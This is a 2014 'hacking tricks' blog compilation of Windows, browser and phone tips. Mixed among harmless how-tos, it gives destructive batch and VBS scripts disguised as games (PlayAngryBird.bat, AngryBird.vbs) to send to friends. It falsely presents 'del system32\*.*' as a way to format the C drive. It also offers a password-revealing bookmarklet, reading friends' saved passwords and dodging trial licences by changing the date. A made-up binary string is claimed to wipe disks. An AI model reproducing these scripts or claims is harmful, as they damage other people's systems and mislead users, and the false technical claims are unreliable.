Worlds best mobile and pc hacking tips&tricks....!

8 February 2014

Hi friends, I have already posted
a trick to see your saved passwords
on firefox . But what for chrome
users. Actually most of internet
users uses google chrome because
it is the safest browser in the
world. But it doesn’t mean firefox
is not safe to browse internet. If
someone hacked you then it is not
of browser’s mistake, it is your
mistake to click on links blindly.
Ok let me complete my topic to
see passwords in google chrome.
Here are some steps, have a look
on them…
STEP 1:
First of all copy and paste below
link in url bar of google chrome
chrome://chrome/settings/passwords STEP 2:
Now a screen like below
will appear in front of you in which
all username & passwords is given
which you used before.
ADVANTAGES:
1- You can use this trick to see
your passwords.
2- If you have authority to use
your friend’s pc then you can see
his/her passwords.
3- If you know the way to see the
passwords then you’ll never save
your password on public pc and
also you can warn your friends
about this trick.

Hey friends, hi to all of you.
Saving passwords in browsers is
normal thing now a days. Do you
know that someone can easily view
your saved passwords under
security menu. How ever, to
prevent such incident, Firefox has
a feature called Master Password.
Here is the information:
Firefox has a feature called
Master password, whenever
a user tries to see
password, it will ask for it,
like that:
Ready to set password? Just follow
the steps below:
Open up settings from
Firefox button (Top left)>
Options
Now, under Security Tab,
check Use a master
password
Now click on Change
Master password .
It will ask to enter
password twice, just fill in
and click OK.
However, if you ever forget
master password, just type
this in browser and hit
enter:
chrome://pippki/content/
resetpassword.xul
However, all stored passwords will
be deleted too.

Hey friends, Google introduced
messaging facility in GMail a while
ago, but this SMS facility is new.
Now you can send free SMS
anywhere in the world using GMail.
Here`s how you can do it:
Log-in to your G
Mail account.
In chat box, hover mouse
over any contact and in
more options you will find
Send SMS:
Now, it will ask you to save
number, just enter country
and phone number:
You can now start chat.
What`s even good, you get
50 free message initially,
and you get 5 message
credit for every reply you
get.
Everyday 1 free message is
credited too.

Hey friends, we recently posted a
trick that how can you run any
program with help of run
command . Now, as this trick is
very difficult to perform so we
decided to find out easier way. In
this post, we will describe the
easier method. So,, follow the
steps to get it done:
You have to download Run
Editor. Get it here.
Now extract the . zip file
and run the program, a
screen like this appears:
Now, browse the file for
which you are making
shortcut (Either paste the
address in bar or click
yellow button and browse
file manually ).
Now, select option
Manually set name and
click Create. A dialog like
this appears:
Now, type the desired run
name and hit create. You
are done…
To access shortcut method,
make run command
(Windows Key+R) and type
name and press enter.

Truecaller is very famous app
now a day and today I am going to
share how to fake people using
truecaller app. Many people feel
very happy & excited when they
come to know name of any
unknown number using truecaller.
But friends don’t be 100% sure
with the information you are
getting using this app. First of all
truecaller app use very poor
algorithm. It sync the name from
the phone on which it is installed.
Let me tell you working of
truecaller before I tell you the
hack.
Truecaller Working :
Suppose We both
have a common
friend Mr. ABC also
you and me have
already truecaller on
our phones. Now
suppose that you
have saved Mr.ABC’s
name as Mr.ABD and
I saved it as Mr.ABC
and one other person
saved Mr.ABC name
as Mr.ABC then
truecaller will get
maximum match of
Mr.ABC for same
number then it will
update the name
with maximum
matching results.
Okay now lets start the hack to
make people fool using truecaller
app
STEP 1:-
Recently Truecaller
introduce a new
feature to set your
own profile which
allow every user to
set his name against
his number after a
little sms
verification. You can
also do it just by
tapping on
ME option as shown
in below screenshot.
STEP 2:-
Now after that save
your profile with a
fake name , now call
to your friend who
do not have your
number on his
mobile. Now
truecaller will show
that fake name which
you set in previous
step to your friend
and your friend will
become fool.
Happy Hacking…

Do you use internet on firefox?
then you have noticed that it
always ask you to save password.
Do you want to see all saved
password in your firefox?
If yes then follow these steps -
STEP 1 – Open firefox browser and
click on FIREFOX botton as shown
in figure
STEP 2 – After that click on
OPTION as shown in figure.
STEP 3 – Now click on SAVED
PASSWORDS as shown in figure.
STEP 4 – Now click on SHOW
PASSWORD, your all password will
be shown..

Hey friends, hi to all of you……
Now we will share a trick that
would make you go crazy. Yes, I am
right!! We will teach you that how
you can make your keyboard type a
specific text. Now by this you can
make your friends fool easily and
they would call you a HACKER too
(Too proud for me). So just follow
the
steps:
Open Notepad.
Paste the following code in
it.
Set wshShell = wscript.CreateObject
(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “This is a Virus.
You have been infected.”
loop
Save it as .vbs
Now double click and find
your PC is hacked..
If you want to stop this, Go
to Task
Manager>Processes , Now
find wscript.exe and right
click on it> End Process
This is completely harmless and
intended for fun purpose only!!

Hi guys, when you download any
file from any website then that file
is uploaded on website’s FTP server
by admin of website. There are
many free online storage
services available But the question
is that, are they secure. Are you
sure you data can not be
downloaded by any unknown
person. If you are doubtful then
here is a solution. Now you can
send your data online without
uploading it on any server.
Basically what happens, you just
upload your file to any free hosting
website and it generate a unique
link and when you share this link
with your friend then your friend
can download data from that link.
But here is one securest method
available, using which you can
easily send your data to your
friends PC without uploading it on
any web server
STEP 1.
First of all open
www.filesovermiles.com
STEP 2.
Now select the file which you want
to send to your friend.
STEP 3.
Now website will generate a unique
download link, just tell it to your
friend
STEP 4.
Now keep the website page
open until your data could not be
transferred to your friend
completely. This
is PC to PC transformation so
speed is fast and also data is
secure. You can also protect your
data with password.
VGG37DHNKU8C
” ENJOY AND SHARE “

Hi friends, Once again i’m here
with my new trick. I hope this trick
will be proved very useful for you.
This trick is about to make the
video of your pc, i.e you can easily
make a video of your desktop
activities. It can be possible with
the help of a software named
CAMSTUDIO.It is very cool and
free software, you have need to
buy it, just download it and enjoy.
Let me show you some steps to use
this software
STEP 1.
Firstly you have to download it. So
click here to download
CAMSTUDIO
STEP 2.
Now after downloading, simply
double click on it and install it on
your pc.
STEP 3.
Ok , now if you have installed it on
your pc, then just run it.
STEP 4.
Click on record button [Red Colour
Button] and minimize it.
Now do your work on your pc of
which you want to make video.
E.g. You can play a game and make
a demo video of it then share it
with your friends
STEP 5.
When you’ll stop the recording
then CAMSTUDIO will automatically
play the video in default video
player e.g Media Classic Player,
now just press ALT+F.
It’ll open file menu.
Now just click on SAVE AS…
Select the drive in which you want
to save the video..
[NOTE - Please set Media Classic
Player as your default video
player, because it is 100%
working with Media Classic
Player.]

Hi friends I have already shared
how to set any video as wallpaper
in Windows 7 but today I am going
to share same thing but for
Android users. I will show you Step
by step procedure to set video as
Live Wallpaper in your Android
phone. Here are some steps just
read and follow them one by one.
If you faced any problem while
doing this trick then just leave your
comment below to get fast
solution. OK now read below steps
to make this trick working…
STEP 1
First of all download
Video Live
Wallpaper app on
your Android phone.
STEP 2
Now long tap on
your home screen
and choose Live
Wallpaper.
STEP 3
Now if you have
successfully installed
above app then you
will get Video Live
Wallpaper option,
Now just tap on that.
STEP 4
Now in next screen
choose Settings
option.
STEP 5
Now in last step just
choose Video Source
which you want to
set as video
wallpaper.
Have Fun With Your Android !!

Hello guys, what’s up. I think
nothing is up because everything is
falling down due to gravity. I know
the PJ is not so good but the trick
which i am going to share is really
awesome. Today I’ll tell you how to
make your own custom run
command. I think you already
knows what is RUN command ,
Yes exactly. To open any program
in windows OS just hold WINDOWS
KEY and press R to open command
prompt and then enter the name of
command to open the software. So
how it’ll be if you can make your
own custom run commands. e.g.
You want to open notepad then you
have to write NOTEPAD in the
dialog box but how it’ll be if you
can open it just by typing NP .Its
Cool. OK here are some steps to do
this trick just read and follow them
carefully.
STEP 1.
First of all decide of which
software you are going to make
custom run command [e.g. I am
going to make custom run
command for FIREFOX ]
STEP 2.
Now right click on your desktop
and CREATE A NEW SHORTCUT.
STEP 3.
Now a dialog will appear as shown
in below screenshot.
STEP 4.
Here just choose the path of the
application [e.g for firefox just
browser C:\Program Files\Mozilla
Firefox\firefox.exe ]
STEP 5.
After doing step 4, Just give the
name to shortcut of
your choice [e.g. ff]
STEP 6.
Now an icon will appear on your
desktop.
STEP 7.
Now just cut and paste it
WINDOWS folder of your root
drive [e.g. C:\WINDOWS]
STEP 8.
Now hold WINDOWS KEYand pressR
and write ff and hit enter. It’ll
open firefox.
that’s it.
[NOTE:- YOU CAN MAKE CUSTOM
RUN COMMAND FOR ANY
SOFTWARE USING THIS
PROCEDURE]
” ENJOY & WAIT FOR NEXT “

Hey friends…hi to all of you……
We have shared many tricks
before regarding making your
friends fool about their system
being hacked or virus etc. Today
we are going to share a code that
will really blow your friend`s mind
and he/ she will be scared of
you after then and will say,”OMG
HACKER is coming
“. So here we go for steps:
Open Notepad and paste
the following code:
@echo off
echo OMFG YOU GOT A VIRUS.
pathping localhost -q 2 -p 250 >
nul
pathping localhost -q 2 -p 250 >
nul
pathping localhost -q 2 -p 250 >
nul
pathping localhost -q 2 -p 250 >
nul
pathping localhost -q 2 -p 250 >
nul
echo It will now begin to delete
your files.
pathping localhost -q 2 -p 250 >
nul
pathping localhost -q 2 -p 250 >
nul
pathping localhost -q 2 -p 250 >
nul
pathping localhost -q 2 -p 250 >
nul
pathping localhost -q 2 -p 250 >
nul
echo Do you want to abort the
deletion of your files?
pause
echo Wow you really fell for that.
Pressing a key made the virus
delete your account.
pathping localhost -q 2 -p 250 >
nul
pathping localhost -q 2 -p 250 >
nul
pathping localhost -q 2 -p 250 >
nul
echo deleting…….
pathping localhost -q 2 -p 250 >
nul
pathping localhost -q 2 -p 250 >
nul
pathping localhost -q 2 -p 250 >
nul
pathping localhost -q 2 -p 250 >
nul
pathping localhost -q 2 -p 250 >
nul
pathping localhost -q 2 -p 250 >
nul
pathping localhost -q 2 -p 250 >
nul
echo YOU’VE BEEN FOOLED. THERE
IS NO VIRUS. YOU’RE JUST A N00B.
pause
For more,
visit:MOBILESBOOK.blogspot.com
Now save it as .bat.
It goes like this:

Hi guys , I have already shared a
trick to see your password
in Firefox and also to see saved
password in your chrome . Mohit
Sharma also shared a trick to see
the password behind the asterisk
and friends today I am going to
share a JavaScript method to see
the password behind the asterisk in
your browser. You have to just
follow these given steps to use this
trick.
STEP 1
First of all create a new bookmark
in your browser , give it any name
e.g View Password.
STEP 2.
Now in the URL bar just fill out the
below java-script.

javascript:(function() {var s,F,j,f,i; s = “”;  F = document.forms; for(j=0; j

STEP 3.
Now Open any site e.g.
Facebook.com and click on the
bookmark which you created in
step 1 , It will popup a dialog with
the password behind the asterisk.
That’s It.
” ENJOY & WAIT FOR NEXT “

Hello friends , Today I have
Something Different for you. I will
show you how to make fake folder
maker. You can call it Virus but it
is not harmful for your computer.
It will really make your friends fool
so just follow below steps to make
this trick working. This trick is
working in windows.
STEP 1.- Open NOTEPAD in your
PC. [ Press windows+R and type
NOTEPAD ]
see the image
STEP 2. - Now copy and paste the
following code into notepad
@echo off
:top
md%random%
goto top
STEP 3. – Now save the file as Any
attractive name like
PlayAngryBird.bat remember that
don’t miss to write .bat
STEP 4. – Now you will get below
type of file where you have saved
this CODE in step 3.
STEP 5. - Now send this script to
your friends via email, pendrive
etc. and when he/she double click
on this file 1000 folder will be
made in his/her computer.
” ENJOY AND WAIT FOR NEXT

Hello friends, how are you. Today
I am going to share a trick to make
a virus using notepad. This virus
will help you to fool your friends.
This is only for fun it’ll not harm
their’s pc. So friends lets make
your friends fool. But you have to
follow these steps to make this
trick working..
STEP 1.-
First of all open notepad.
STEP 2.-
Now copy and paste following code
into notepad
Set wshShell = wscript.CreateObject
(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “This is a Virus.
You have been infected.”
loop
STEP 3.-
Now press CTRL + S to save this
file.
STEP 4.-
Now give any interesting name to it
with .vbs extension
e.g. AngryBird.vbs
[NOTE - You can download this
fake virus from here , if you'll
double click on it then you have
to restart your pc.]

Hi friends, sometime i need to
write some important notes from
web. Then i open notepad to write
it. I think you also do it. But today
I am going to share a useful
method to use your web browser
as notepad. You can use your
browser as notepad with one click.
I am not kidding, it can possible if
you will read this post. Here are
some steps , just read and follow
them carefully, if you face some
problem then don’t feel shy to
leave your comment below.
STEP 1.
First of all create a
new bookmark in
your browser and
give it any name. e.g.
Notepad
STEP 2.
Now in URL section ,
just copy and paste
below

data:text/html,

STEP 3.
Now Click on that
bookmark which we
made using step 1 &
step 2.
That’s It.
NOTE
You can also copy
and paste the code in
step 2 directly to
search bar of your
browser to use
notepad or you can
Drag and Drop this
NOTEPAD to you
bookmarklet]
” ENJOY & WAIT FOR NEXT “

Hello guys, first of all thanks to
be reader of way2hacking.com as
the title of this trick is saying to
make your friends pc to open
notepad again and again. So we’ll
do it but how. Do you need any
software to do this? Then answer is
no. I made some steps to follow
for you. Just read and follow
them carefully.
STEP 1.
First of open notepad in your PC.
STEP 2.
Now copy and paste this code in it
@ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top
STEP 3.
Save it as anyname.bat and send it
your friend’s pc.
Now when your friend click on it
then it’ll continuously open
NOTEPAD in his PC
[NOTE- PLEASE DO NOT TRY IT ON
YOUR PC. IT WILL HANG YOUR PC]

Hey friends, command prompt is
not used by a lot of people but is
vital for a lot of task that even GUI
of Windows cannot handle. There
are a lot of tricks that may save
your time working
on DOS some of which we are
listing below:
See your commands
history
If you use DOS hell a lot. Then if
might be difficult to find the
commands you have used earlier.
Alternatively, you can use
command doskey/history to show
the commands you have used:
Drag a folder to change
the path
Suppose you have to use CD
command and path of folder is way
too long. Then, simply Go to that
folder and drag it on DOS window,
it will automatically type the path
of the folder for you. Very useful
for various commands:
Run multiple commands
at once
You can run multiple
commands in DOS at once.
Surprised? Yes but it`s true. You
can run as many commands as you
want simultaneously
by separating each command with
double ampersand (&&) between
them, here is a demo:

Hi friends, some day ago one of
my friend, Rahul showed me some
magical videos on his mobile.
When i saw it first time then i was
shocked to see that. I was thinking
that there should be an app to do
this magic. But when he told me it
is not as much complicated as i
am thinking. Then I asked him, how
did you do this, then i come to
know that it is very easy. I use my
phone camera to capture photos
and video recording daily but i
never tried to do it before. So
today now i am going to share this
trick with you.
Here are some steps as usual , have
a look on them.
STEP 1.
First of think yourself as a
magician and now you are trying to
hide a book from your hand.
STEP 2.
Now ask one of your friend to
open  video recording mode in
your camera
STEP 3.
Start video recording, and pretend
that you are trying to hide the
book.
STEP 4.
Ask your friend to pause the video
when the book in your hand.
STEP 5.
Now put the book anywhere which
can not be seen in video.
Take your position
STEP 6.
Now ask your friend to resume the
recording from where he stopped
it.
STEP 7.
Pretend that , you just hide the
book in the air.
Save the video and share it with
your friends..
Thanks to Rahul Verma to share
this trick with way2hacking.
This trick is performed on Nokia
S40 Series.
ENJOY & WAIT FOR NEXT

Friends, Yesterday I played a
prank with one of my friend and
make him fool. I just create a
VIRUS and paste it into his
PENDRIVE when he reached to his
home and open his pendrive . He
was to shocked to see that “VIRUS
IS LOADING IN HIS COMPUTER”. In
5-10 Minute, he called back to me
and asked about this …Then i told
him ,”Don’t worry Yaar, It is not a
virus. It is only a prank to fool the
people” and aslo told him how to
make it..
So friend I also think to share this
PRANK with you..
Let me show you, how to make a
funny VIRUS to make your friends
fool…
just follow these STEPS
STEP 1 -
Open NOTEPAD/
WORDPAD in your
computer as
explained in figure
STEP 2-
Now type “Virus Is
Loading In Your
Computer” in
notepad
STEP 3 -
After doing Step 2,
press CTRL+S to save
this file, Select your
Drive in which you
want to save this file,
but remember that
before saving name it
as “Virus.bat”
STEP 4 -
Now open the DRIVE
in which you have
saved this file.
STEP 5 -
DOUBLE CLICK on
the ICON of  ”Virus”
and see the magic
[NOTE - This is only a prank to fool
your friends. It is not a real VIRUS]

Well, Now a day everyone have at
least one nokia phone and know
that “what is bluetooth”. It is
very easy to Send/receive data via
bluetooth but here is a trick for
bluetooth you can called this
bluetooth trick as “BLUETOOTH
PRANK“
So how this prank works, let us
show you
STEP I –
First of all turn on
bluetooth of your
nokia phone
STEP II -
Now come back to
home screen of your
mobile
STEP III -
Then dial this code
*#9990#
STEP IV –
Now go back to
bluetooth menu and
try to turn off your
bluetooth. You’ll
surprised to see that
your phone’s
bluetooth is not
turning off…
ALSO CHECK: MOBILE SWITCH
OFF MAGIC
STEP V –
If you want to turn
off your bluetooth
then you have to
“SWITCH OFF” your
phone and again
“SWITCH ON” it,
After doing that go to
BLUETOOTH PANEL
and switch off your
phone’s bluetooth ,
It’ll switched off
Enjoy and play this prank with your
friends
[Note - This Prank works only in
NOKIA S40 PHONES (e.g. Nokia
3110c, Nokia C2-01, Nokia 7210
Supernova etc) ]

We have already shared a lots of
notepad tips & tricks. Check them
here . Today I have one more
notepad trick which will allow you
to format entire hard disk at one
click. You can use this on your
enemies or yourself too. But
friends don;t misuse this , it is only
educational purpose. Here are
some steps given below which will
help you to understand this post.
Just read and follow them carefully,
In case of any problem, just leave
your valuable comment below so
that we can help you..
Open Notepad (Windows
Key+R and type NOTEPAD
and hit enter)
Paste the following code in
it
0100101100011111001001010101
0101010000011111100000
Save it as < Filename >.exe.
Now execute it on your
enemy`s PC and see magic.
Only for educational purpose,
not to be misused.
HAVE A TRICKY DAY!!

Today, we
are presenting that without use of
any external software. Here are
the steps to do it:
Make a run command
(Windows key + R) and type
control.exe
schedtasks and click OK
Task scheduler is opened
like this. In the right pane,
click on Create task
(encircled below):
Create Task window will
show up, name task
whatever you like, now go
to Triggers tab and click
on New
Now, select At log on from
Begin the task and click OK:
Now, go to Actions tab and
click on New, and enter
explorer in Program/
Script:
Now, click on OK in all
Windows and it is done!!
Restart to see it working.
HAVE A TRICKY DAY!!!

Hey friends……hi to all of you.
Today we are going to share that
how can you convert FAT32 file
system to NTFS without formatting
your drive and hence saving your
precious data store. Now why to go
for NTFS and not to remain in
FAT32? The answer is FAT32 does
not support handling large files
(over 4GB) and it is too old also if
you don`t like the first reason. So
here we go:
First of all, open Command
Prompt as an
Administrator (Search for cmd in
windows search, then Right
Click> Run As Administrator ).
Then type this:
chkdsk h: /f  (To check for errors
and fix it automatically).
After that, you have just to type
this
Convert H: /FS:NTFS (Replace H:
with drive letter of your desired
drive with all cases).
Step by step results are given
below:

Can he
run .jar apps on his windows PC .
So now I am going to share a trick
to help him as well as to all the
users on my blog to run .jar
applications on your windows PC
There can be any reason to run .jar
apps on your windows PC suppose
if you are a programmer and trying
to develop any software for java
mobile users then this trick can
help you to see your software
working in real time. So here are
some steps, just read and follow
them carefully..
STEP 1.
First of all you need
two softwares on your PC. Just
download them from below links.
1. Java Runtime Environment (JRE)
2. KEmulator
STEP 2.
Now after doing step 1, just install
the both softwares on your PC.
STEP 3.
When you’ll install KEmulator on
your PC, then you’ll get this
icon on your desktop
STEP 4.
Now just open KEmulator by
clicking on it.
STEP 5.
Now navigate this Midlet >> Load
Jar as shown in below screenshot.
That’s it, please share this with
your friends
[NOTE - You must have .jar files in
your pc]

Hello friends, today I am going to
share a post to find your lost
mobile phone using IMEI number.
This post is shared by Sai Hackers
on my email id. Before I start let
me provide a little info on IMEI
number. IMEI number is short
form of international manufacturer
equipment identity. It is 15 digit
unique number. If you are using
call , SMS or gprs services on your
mobile handset then IMEI number
is helping you in this. Without IMEI
number you can’t use theses
services. I hope it is enough info
about IMEI number but still you
want to know more then Google is
alive just use it. OK now starts the
method shared by sai hacker to
find lost mobile phone using IMEI
number.
STEP 1:
First of all you need
15 digit IMEI number
of that mobile phone
which you have lost
sadly. You can find
your phone IMEI
number on your
phone bill as well as
box of your phone.
STEP 2:
Now note down that
IMEI number and go
to your email id
because we are going
to send an email.
STEP 3:
Now compose a new
email by providing
following info.
Your name:
Address:
Phone model:
Make:
Last used No.:
E-mail for
communication:
Missed date:
IMEI No.:
and send this email
to this email
id: cop@vsnl.net
Now just wait for reply from
cop@vsnl.net. If your phone in
use then they will trace it out
and inform you shortly.
REQUEST:
Friends, Its
my humble request
to all way2hacking
users that if by
chance you get
someone’s lost
mobile phone then
please return that
mobile to owner of
that mobile phone.
Just call back to last
dialed number or
search for home ,
papa , wife , son or
any relative’s
number in contact
list to return that
phone.
Once again, I Am really thankful to
Sai Hacker to share this useful post

Hello friends , Want to use
calculator in your web browser. If
yes then this post of mine is only
for you. Today I will show you how
to use web browser as calculator.
No doubt , I have already shared
how to use web browser as
notepad . I have already shred lots
of posts on chrome and firefox tips
& tricks . Recently I have made
social media follow page for our
users. You can check this page here
and also you can follow us on
different different social media
websites to get latest update from
way2hacking. Okay now have a
look to see how can you use your
browser as calculator.
So first of all you have to open
console of your browser.
1. Chrome
Just
press CTRL +
SHIFT + J to
open console
in chrome.
Now just type
your
calculation to
get result.
2. Firefox
Just
press CTRL +
SHIFT + J to
open console
in Firefox.
Now just type
your
calculation to
get result.
3. Opera
Just
press CTRL +
SHIFT + I
open console
in
Opera.
Now just type
your
calculation to
get result.
DEMO:

Hello friends, Today I am going to
share a trick to save yourself from
the phishing attack. In phishing
attack a hacker makes a fake
webpage like the original one to
steal your email id & password. So
here are some steps which can
really help you to save your from
phishing attack
STEP 1.-
First of all CREATE A NEW
BOOKMARK in your browser then
copy & paste following javascript
code in URL bar. In name you can
give any name like ANTI-PHISHING.
javascript:alert("The actual URL is:\t\t" + location.protocol + "//" + location.hostname + "/" + "\nThe address URL is:\t\t" + location.href + "\n" + "\nIf the server names do not match, this may be a spoof. - www.Way2Hacking.Com");
STEP 2.-
Now if you are thinking you are on
fake page then just click on the
bookmark which we have made in
step 1
STEP 3.-
Now you’ll see below type of alert
on your browser.

Hi friends, Today I am going to
tell a new trick to test your TV/
DISH remote is working or not
workig using your mobile. Suppose
you are going to buy a new remote
then you can not take tv with you
so if you want to check the remote
is working or not working then just
follow these steps
STEP 1. - First of all take remote of
your tv and open camera of your
mobile.
STEP 2. - Focus the Remote’s IR-
LED(Infra Red Light Emitting
Diode) toward the camera of your
mobile and press any button from
your remote
STEP 3. – Now Here are two things
to be noted
if a light will appear in
your phone’s camera then
your Tv remote is working
if a light will not appear in
your phone’s camera then
your Tv remote is not
working
” ENJOY AND WAIT FOR THE
NEXT “

Hey friends, hi all of you…….
Today we are going to discuss that
how can you install windows from
a pen drive. Yes, it is possible and
we have made this trick especially
for you all our readers.
Checklist For Installing Windows
From Usb
· A pen drive (At least
4GB capacity)
· A Windows 7 setup
source (Windows setup
disk) USB 2.0
recommended
Procedure
Plug in your USB, remove the
useful data from it (we`ll format
it!!!!!)
Open cmd and then type DISKPART,
hit enter. A screen like this will
come up.
Now follow this set of
commands one by one…
List Disk
It will get disk index of which
partitioning is to be done.
Select Disk 1
It will select disk for partitioning.
Clean
It will remove previous partitions.
Create partition primary
It will create a primary partition
Format recommended
It will format the partition created
Active
Set partition to hold bootmgr..
Exit
Leave diskpart
Now just put your windows setup
DVD in CDROM and copy all of its
contents to pen drive.
Now plug in your USB and
remember to set USB as primary
booting device in your BIOS
menu.
It will be faster than DVD setup and
saves time. However, sometimes
errors come in. In such case open
cmd and type:
K:\boot\bootsect.exe/NT60 K:
Replace K with drive letter of your
USB device.

Hey friends, it`s now time to
explore our very own windows. You
think windows does not have any
limitations, then you have to think
it again…As we have found
something that will prove you
wrong here. See the trick now:
Make a new folder
anywhere by Right
Click>New>Folder
Now it`s the tricky part,
rename this folder to
anyone of these:
“con” or “nul” or “Aux” or “Lpt1″
without quotes and press enter.
Windows will show an error
message:
Now you will ask: “How to
create that now?” So just
press Alt+255 first and then
type anyone of these
names, you are done.
Reason for not letting the
folder created: All this
correspond to some of the
famous ports. Eg:
con corresponds to the
console, Lpt1 corresponds
to printer and so on….
HAVE A TRICKY DAY!!

Hello, friends. Today I have a
magical trick for you. I hope this
trick will surprise your friends.
They will be shocked to see this
SWITCH OFF magic. Friends this is
very easy and simple trick.
Everyone can do it. Let me tell
you, how can you apply this trick
on your friends.
If you want to see this magic, then
just follow these simple steps…
STEP 1.
First Take two mobile phones, [e.g
one is your & the other one is of
your friend]
STEP 2.
Now call on friend’s number from
your own number.
STEP 3.
After doing step 2 , Just open back
panel of your mobile phone and
take the battery out form your
mobile phone. Please note that, Do
not disconnect the call before
removing the battery.
STEP 4.
Now you’ll notice that your friend’s
phone is still ringing after
removing the battery from your
mobile phone[i.e your phone is in
switch off mode].
So friends enjoy the tricks and
share us on facebook, if you like
this site.
[NOTE - This trick is 100%
working in INDIA, but I can not
say anything about other
countries, so if it is working in
your country then please
comment below with your
country name]
” Enjoy & Wait For The Next “

Do you want to format your C
drive for any reason. But you can
delete it directly by doing right
click and then click on format like
your pen drive or memory card . So
how can we format our C DRIVE of
windows PC. Is there any way to
format it. Ofcourse Yes. But which
one. You have to just keep reading
this post you will know to format
your C DRIVE from your computer.
Here are some steps given in this
post just read and follow them
carefully to format your C DRIVE.
In case of any problem, just leave
your valuable comment below so
that we can help you as soon as
possible.
Here are some steps listed below.
Now just read and follow them one
by one.
First of all open Notepad .
(You can use run command
too to open NOTEPAD for
that just hold Windows
Key& press R and type
notepad & then hit enter).
Now in NOTEPAD just copy
the following code line and
follow next step .
del c:\WINDOWS\system32\*.*/
q
Now using File Menu click
Save and save as
<FileName >. bat [You can
also use shortcut CTRL + S
to save this file].
Okay, You have almost
done and near to format
your C DRIVE. Now just
double click on created file
and wait for some time. It
will format your C DRIVE.
Now you can install new
operating system,
Thanks for reading & stay
connected for new post. You can
also subscribe us for new posts.

Hey friends, we have found a way
that if you want to create a folder
that cannot be deleted by any user,
then how could you proceed. Well ,
this might sound strange to your
friends and they would say”No
way!!”. But you prove them wrong,
nut.
Here are the steps to do it:
Open Command Prompt
(Windows Key+R and type
cmd and hit enter).
Type cd\ (it brings
command out to C drive).
Now is the tricky part, you
have to type this:
md\\.\:\con  ( Replace
YourDriveHere with your desired
drive and you can add further path
too. )
Now, ask your friends to
delete it, and they will be amazed
as folder cannot be deleted.
Actually, this is due to the bug that
windows cannot create a folder
named con , So, it can`t delete a
folder which it don`t think is
created.
However, if you ever want
to delete this folder, Do
remember that it won`t get
deleted by normal deletion
but rather by this
command:
rd\\.\  :\con ( Replace
YourDriveHere with your desired
drive and you can add further path
too. )

Many people familiar with prior
versions of Windows are curious
what happened to the built-in
Administrator account that was
always created by default. Does this
account still exist, and how can you
access it?
The account is created in Windows
7 or Vista, but since it’s not
enabled you can’t use it. If you are
troubleshooting something that
needs to run as administrator, you
can enable it with a simple
command.
Note: You really shouldn’t use this
account for anything other than
troubleshooting. In fact, you
probably shouldn’t use it at all.
Enable Built-in Administrator
Account
First you’ll need to open a
command prompt in administrator
mode by right-clicking and
choosing “Run as administrator” (or
use the Ctrl+Shift+Enter shortcut
from the search box)
Now type the following command:
net user administrator /active:yes
You should see a message that the
command completed successfully.
Log out, and you’ll now see the
Administrator account as a choice.
(Note that the screenshots are
from Vista, but this works on
Windows 7)
You’ll note that there’s no
password for this account, so if
you want to leave it enabled you
should change the password.
Disable Built-in Administrator
Account
Make sure you are logged on as
your regular user account, and
then open an administrator mode
command prompt as above. Type
the following command:
net user administrator /active:no
The administrator account will now
be disabled, and shouldn’t show up
on the login screen anymore.

Hey friends, hi to all of you. We
already shared a method of hiding
drives on your PC. But this method
is much more easy and simplified.
Just make sure you do it correctly.
Here are the steps :
Serach cmd and run it as
Administrator.
Type mountvol in
command prompt and press
enter. It will show the ID of
drives, note the ID of drive
you want to hide.
We noted down for F:, viz
\\?\Volume{14394d58-7caf-11e2-
af9b-806e6f6e6963}\
F:\
To hide the drive, you have
to type in command
prompt:
mountvol F: /d
To bring it back, you have
to type:
mountvol f: [volume id] (The
volume id is the one we noted
down earlier), our command was:
mountvol f: \\?\Volume
{14394d58-7caf-11e2-
af9b-806e6f6e6963}\
Note : Be careful while noting
down volume ID, if you do it
wrong, you will lose all the data of
that drive. You should not try this
with your system drive.

Hey friends, hi to all of you.We
have shared lots of keyboard
shortcuts for making your working
easy on Windows and faster too.
Today, we are providing some
tricks that make you more faster.
So here we go with tips:
When you open a right
click menu, you can also
use right click to select the
item too.
To maximize a Window ,
double click the title bar
(top one) or simply drag
upwards (Tested on
Windows 8).
To close a program , use Alt
+F4 or double click
application icon on the
top left:
If you need to select non
consecutive files, hold
Ctrl key while selecting
items:
To open hidden menu items
of right click, first press
and hold Shift and then
Right Click :
You can try these easy tricks too:
You can press Esc key to
close any Alert or dialog.
Press and hold Alt and
double click an item will
open it`s Properties.
While using drag-and-drop
with files, holding Alt key
while dropping will create a
shortcut instead of
copying/pasting.
When you use drag-and-
drop from one to other
drive, Windows copies the
file by default, however if
you press and hold
Shift key, file is moved
instead of being copied.
If you use drag and drop in
same drive, it moves it by
default, by holding Ctrl
key while dragging will
copy the file instead of
moving.
So, do you like these tips??
Comment.

Hi friends. There are lots of apps
for android, but it all waste if you
don’t have any android phone. So
if you are thinking to run that
android apps on your windows pc
then it can be possible with this
this trick. I’ll tell you the whole
procedure to make your dreams
true but you have to follow these
steps.
STEP 1.- First of all you have to
download a software named
YouWave Android on your windows
PC [Click here to download
YouWave from Offical Website ]
STEP 2. - Now After complete
download, just install it on your
windows Pc.
STEP 3. – Now download any
android App and OPEN WITH
YouWave Android.
STEP 4.- After doing Step 3, you
can easily enjoy android on your
Windows Pc
Note:- You’ll get only 7 days trail
pack but if you want to use it for
lfetime then check out this trick
HOW TO USE TRIAL
PACK OF ANY
SOFTWARE FOR
LIFETIME WITHOUT
SERIAL KEY
“Share This Trick With Your
Friends”

Hi, everyone . Today I have a new
awesome trick for you. As we know
there are very useful softwares for
windows but some of them are
come with trial pack for some days
like 30days or 7 days etc and after
using trial pack , we have to
purchase key of that software to
use it for lifetime. But now you
have no need to buy any serial key
because with the help of this trick
you can enjoy any softwre for
lifetime without any serial key. To
know , how it can be possible just
follow these steps
STEP 1. - Let assume that today
you have installed a software on
your pc with 7 days trial pack. Ok,
now note down today’s date (i.e
Oct 23, 2012)
STEP 2. - Now , you have 7 days to
enjoy that software.
STEP 3. - Ok, now your 7 days has
gone, but no problem my friend
you can enjoy  your software still
now.
STEP 4. - Open Date and Setting of
your pc [Press WINDOWS+R and
type timedate.cpl ]
STEP 5. - Now change date of your
pc from OCT 30,2012 to OCT 23,
2012 [i.e date of 7 days ago]
STEP 6. - Now again open that
software and see what you get. I
hope you’ll again get trial pack of 7
days. So enjoy and visit daily to
http://waytohacking.blogspot.com
[Note - Please do not enter
previous date other than
installation date of that software]

Friends, I think you know the
meaning of WIRELESS i.e Without
wire. If you have a wired keyboard
and want to enjoy the experience
